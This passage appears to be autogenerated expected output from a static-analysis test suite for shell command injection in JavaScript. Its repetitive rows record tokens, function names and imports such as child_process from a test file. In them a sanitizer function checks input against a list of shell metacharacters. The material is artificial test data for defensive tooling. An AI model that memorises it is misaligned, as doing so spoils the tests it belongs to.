fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | result | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:18 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:26 | i <= 2000 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:26 | i <= 2000 | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:26 | i <= 2000 | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:26 | i <= 2000 | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:18:376:26 | i <= 2000 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:23:376:26 | 2000 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:23:376:26 | 2000 | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:23:376:26 | 2000 | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:23:376:26 | 2000 | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:23:376:26 | 2000 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | result | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:29 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i++ | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i++ | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i++ | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i++ | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:376:29:376:31 | i++ | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:7:398:16 | !(s[i] ... == '"') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:7:398:16 | !(s[i] ... == '"') | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:7:398:16 | !(s[i] ... == '"') | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:7:398:16 | !(s[i] ... == '"') | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:7:398:16 | !(s[i] ... == '"') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:8:398:16 | (s[i] = ... == '"') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:8:398:16 | (s[i] = ... == '"') | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:8:398:16 | (s[i] = ... == '"') | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:8:398:16 | (s[i] = ... == '"') | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:8:398:16 | (s[i] = ... == '"') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:9 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:9 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:9 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:9 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:9 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:12 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:12 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:12 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:12 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:12 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:26 | s[i] === undefined | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:26 | s[i] === undefined | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:26 | s[i] === undefined | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:26 | s[i] === undefined | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:377:26 | s[i] === undefined | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:378:15 | s[i] == ... === '>' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:378:15 | s[i] == ... === '>' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:378:15 | s[i] == ... === '>' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:378:15 | s[i] == ... === '>' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:378:15 | s[i] == ... === '>' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:379:15 | s[i] == ... === '<' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:379:15 | s[i] == ... === '<' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:379:15 | s[i] == ... === '<' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:379:15 | s[i] == ... === '<' | enclosingFunctionName | 